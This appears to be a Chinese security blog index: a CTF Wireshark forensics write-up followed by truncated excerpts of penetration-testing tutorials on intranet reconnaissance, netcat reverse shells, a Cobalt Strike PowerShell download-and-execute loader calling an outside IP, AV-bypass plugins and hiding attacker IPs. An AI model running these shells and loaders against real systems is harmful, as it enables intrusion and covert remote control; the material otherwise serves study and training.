啥也不会,照着别人wp捋一遍
WSWireshark1_1
题目内容:
被入侵主机的IP是?
直接tcp.connection.synack去筛选也只有一条数据
就可以确认被入侵的主机ip了,或者直接浏览数据包也可以发现,被入侵的主机ip是192.168.246.28
1flag`:`192.168.246.28
Wireshark1_2
题目内容:
被入侵主机的口令是?
直接找到telnet的登录流量进行tcp追踪,tcp流0中就有被入侵的主机口令
1flag:youcannevergetthis
Wireshark1_3
题目内容:
用户目录下第二个文件夹的名称是?
也是tcp流0,虽然有点乱码但是也可以判断出第二个文件夹的名称是Downloads
1flag:Downloads
Wireshark1_4
题目内容:
/etc/passwd中倒数第二个用户的用户名是?
还是tcp流0
1flag:mysql
HWhard_web_1
题目内容:
服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了80 81 ...
工作组信息收集用户信息12345678910111213141516171819#查看本机用户列表net user#获取本地管理员信息net localgroup administrators#查看当前在线用户quserquery userquery user || qwinsta#查当前用户在目标系统中的具体权限whoami /all#查看当前权限whoami && whoami /priv#查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILEnet localgroup
系统信息12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061#查询网络配置信息。进行IP地址段信息收集ipconfig /all#查询操作系统及软件信息systeminfo /fo listsysteminfo | findstr "主机名"systeminfo | findstr ...
系统下载
系统
角色
IP
Windows Server 2012 R2
域控
10.10.10.10
Windows Server 2008 R2
域成员
10.10.10.20
Windows 7
域成员
10.10.10.30
https://mp.weixin.qq.com/s?__biz=MzI5MTA1ODk5NQ==&mid=2247484151&idx=1&sn=f1e95bb472fbe2793a213a2e2d7f4ec3
Windows Server 2012 R2
镜像下载:ed2k://|file|cn_windows_server_2012_r2_vl_with_update_x64_dvd_6052729.iso|5545527296|BD499EBCABF406AB82293DD8A5803493|/
Windows Server 2008 R2
镜像下载:ed2k://|file|cn_windows_server_2008_r2_standard ...
什么是内网渗透在拿到webshell/meterpreter/beacon的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之 后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。
内网渗透的第一步,内网信息收集
内网外网简介内网外网概念内网
内网又称局域网(Local Area Network,LAN),是指在某一区域内由多台计算机以及网络设备构成的网络,比如校园网、政府网等,一般方圆几公里。
我们常说的内网,从字面意思上来讲是区别于外网的,也就是说内网一般是用于局域网内部的计算机之间的互相通信,如果需要访问Internet,需要借助外网。
外网
外网也被称为广域网(WAN),是连接不同地区局域网或城域网计算机通信的远程网。
所覆盖的范围从几十公里到几千公里,它能连接多个地区、城市和国家,或横跨几个洲并能提供远距离通信,形成国际性的远程网络。
广域网并不等同于互联网。
内网与外网区别
内网和外网的覆盖范围不一样,内网通常是一个学校、一个医院的网络,外网通常指Internet网;
内网一般是用于局域网内部的计算机之间的互相通信, ...
Linux文件描述符文件描述符简介文件描述符是一个非负整数,内核需要通过这个文件描述符才可以访问文件
文件描述符好比一本书的目录(索引),通过这个索引可以找到需要的内容在Linux系统中内核默认为每个进程创建三个标准的文件描述符:0(标准输入)、1(标准输出)、2(标准错误)
通过查看 /proc/PID/fd 目录下的文件,就可以查看每个进程拥有的所有文件描述符
例如:查看当前shell的文件描述符
1/proc/$$/fd
当打开文件时,系统内核会为特定的进程自动创建对应的文件描述符例子:
12345678#tail打开一个文件tail -f flag#获取tail进程PIDpidof tail#查看tail进程创建的文件描述符ll /proc/5539/fd
可以看到存在一个文件描述符 3 索引打开的 /root/Desktop/flag 文件
标准文件描述符
Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符
文件描述符
缩写
描述
默认设备
0 ...
反弹Shell简介正向shell
正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。
反向shell
反向shell(反弹shell):被控端主动发起连接请求去连接控制端。
通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
NCNC正向Shell
被控端:nc -lvvp 6666 -e cmd.exe控制端:nc 192.168.247.131 6666原理:被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell
被控端:
控制端:
NC反向Shell
控制端:nc -lvvp 7777被控端:nc -e cmd.exe 192.168.1.105 7777原理:被控端将cmd.exe重定向到控制端的7777端口,控制端只需要监听本地的7777端口,即可获得shell。
控制端:
被控端:
Mshta
Mshta.exe 是用于负责解释运行 HTA (HTML应用程序)文件的Windows OS实用程序。 可以运行JavaScript或VB ...
CS的Powershell加载器在cobaltstrike中,我们经常会使用powershell远程加载上线,下面来大概分析下其基本原理。
CS生成Powershell反弹shell
1powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.236.16.67:802/a'))"
获取远程加载代码
访问url链接即可获得如下代码
1$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("...base64加密字符串..."));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
代码解释
先 base64 解码一段字符 ...
CobaltStrike扩展脚本扩展脚本简介扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能
选择菜单栏的 CobaltStrike > Script Manager(脚本管理器),点击 Load(加载),然后选择要使用的.cna扩展文件即可
常用扩展脚本插件后渗透插件-梼杌:https://gitee.com/yijingsec/taowu-cobalt-strike-en
免杀插件-bypassAV:https://gitee.com/yijingsec/BypassAV
上线linux主机-CrossC2:https://gitee.com/yijingsec/CrossC2
CS上线Linux主机CrossC2介绍项目地址:https://gitee.com/yijingsec/CrossC2项目文档:https://gitee.com/yijingsec/CrossC2/blob/cs4.1/README_zh_full.md
Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobalt ...
Powershell基础Powershell简介
什么是 Windows PowerShell
Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言,基于 .NET 框架。
是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。
用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。
被广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避 Anti-Virus 检测。
Windows PowerShell 中的命令称为 cmdlet ,发音为“ command-lets ”,其中每个 cmdlet 代表特定的功能或基于任务的脚本。
Powershell 默认安装在Win7及以后的系统上。
操作系统信任,提供Windows操作系统的几乎一切访问权限
Windows PowerShell 集成脚本环境(ISE)
为什么使用 Windows PowerShell
它既是脚本语言,又是命令行Shell。它可以与不同 ...
域名上线隐藏IP为什么要隐藏IP在使用MSF或者CS获得目标机Sessions或者Beacon时,如果直接使用自己的VPS作为MSF或CS的服务器时,容易被溯源到攻击者所在VPS主机IP。
域名上线原理当我们访问域名时会经过域名解析,域名解析就是将域名转换到IP地址的过程,我们通过域名访问服务器,实际上是访问的目标服务器IP地址
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA ...